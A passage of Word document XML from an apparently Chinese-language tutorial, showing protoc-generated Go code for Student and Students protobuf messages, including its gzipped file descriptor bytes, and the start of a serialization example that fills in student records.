        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>if m != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E63183B" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return m.School</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA5982E" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCBE337" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8B244" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B82CA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2315600B" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0612459D" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>proto.RegisterEnum("main.ClassName", ClassName_name, ClassName_value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060553AF" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>proto.RegisterType((*Student)(nil), "main.Student")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1568042B" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>proto.RegisterType((*Students)(nil), "main.Students")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5274A3D0" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD3342" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78645CDD" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func init() { proto.RegisterFile("test.proto", fileDescriptor_c161fcfdc0c3ff1e) }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4B8E16" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696A8F4" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var fileDescriptor_c161fcfdc0c3ff1e = []byte{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC4CA4" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>// 204 bytes of a gzipped FileDescriptorProto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A750BAB" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x3c, 0x8f, 0xcd, 0x4e, 0xc5, 0x20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174D5BAA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x10, 0x85, 0x85, 0x56, 0xae, 0x1d, 0xa3, 0x92, 0x59, 0x18, 0x76, 0x92, 0x9b, 0x98, 0x10, 0x17,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2599C" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x35, 0xf6, 0x3e, 0x82, 0x2b, 0x37, 0x2e, 0xf0, 0x09, 0x90, 0x12, 0x7f, 0xd2, 0x42, 0xd3, 0xc1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F468C5" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0xf7, 0x37, 0x45, 0xec, 0xee, 0xfb, 0x72, 0xe0, 0xcc, 0x0c, 0x40, 0x0e, 0x94, 0xfb, 0x65, 0x4d,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02644921" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x39, 0x61, 0x3b, 0xbb, 0xaf, 0x78, 0xfc, 0x86, 0xc3, 0x5b, 0xfe, 0x19, 0x43, 0xcc, 0x88, 0xd0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C561854" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x46, 0x37, 0x07, 0xc5, 0x34, 0x33, 0x9d, 0x2d, 0x8c, 0x12, 0x1a, 0xf7, 0x11, 0x14, 0xd7, 0xcc,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF04833" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x9c, 0xdb, 0x0d, 0x51, 0xc1, 0xc1, 0x8d, 0xe3, 0x1a, 0x88, 0x54, 0x53, 0x1e, 0xfe, 0x2b, 0xde,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360EBCC5" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x01, 0xf7, 0x51, 0xb5, 0x9a, 0x99, 0xeb, 0xe1, 0xa6, 0xdf, 0xda, 0xfb, 0xe7, 0xc9, 0x11, 0xbd,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6CAF4D" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0xba, 0x39, 0x58, 0xee, 0xe3, 0xf1, 0x05, 0x2e, 0xea, 0x2c, 0xc2, 0x7b, 0x10, 0x4b, 0x58, 0x29,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8DFFBA" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x45, 0xc5, 0x74, 0x63, 0x2e, 0x87, 0xab, 0xbf, 0x0f, 0x35, 0xb7, 0x35, 0xc4, 0x5b, 0x10, 0xe4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14986BFF" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x3f, 0x53, 0x9a, 0xca, 0x0a, 0x9d, 0xad, 0xf6, 0xf0, 0x08, 0xdd, 0xde, 0x8d, 0x00, 0xc2, 0x6f,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3673DEEB" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0xf2, 0x24, 0xcf, 0x76, 0x1e, 0x24, 0xdb, 0xf9, 0x24, 0xf9, 0xbb, 0x28, 0x47, 0x9f, 0x7e, 0x03,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163BA993" w14:textId="77777777" w:rsidR="00DD38D6" w:rsidRPr="00DD38D6" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00, 0x00, 0xff, 0xff, 0x67, 0x97, 0x87, 0x75, 0x02, 0x01, 0x00, 0x00,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7838B5FD" w14:textId="09E53BD4" w:rsidR="00DC6177" w:rsidRDefault="00DD38D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD38D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5BD40" w14:textId="152A3298" w:rsidR="00DC6177" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE3ABBE" w14:textId="4F40462E" w:rsidR="00DC6177" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD1285A" w14:textId="4605F623" w:rsidR="00DC6177" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC076DA" w14:textId="2E52F584" w:rsidR="00DC6177" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用及序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC5D067" w14:textId="62D9028A" w:rsidR="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78EB6BD3" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94759C" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70DA88" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C6CCD" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40669C56" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>"github.com/golang/protobuf/proto"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B885AFF" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917C013" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F309822" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26491450" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s1:=&amp;Student{} //</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>第一个学生信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D113C" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s1.Name="jz01"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AB1247" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s1.Age=23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE8DB5A" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s1.Address="cq"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933CFF5" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s1.Cn=ClassName_class2 //</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>枚举类型赋值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BDAFB1" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>ss:=&amp;Students{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09C9ED" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>ss.Person=append(ss.Person,s1) //</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>将第一个学生信息添加到</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Students</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>对应的切片中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659484E1" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s2:=&amp;Student{}  //</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>第二个学生信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA8847" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s2.Name="jz02"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480ACBC8" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s2.Age=25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61389624" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s2.Address="cd"</w:t>
      </w:r>
    </w:p>
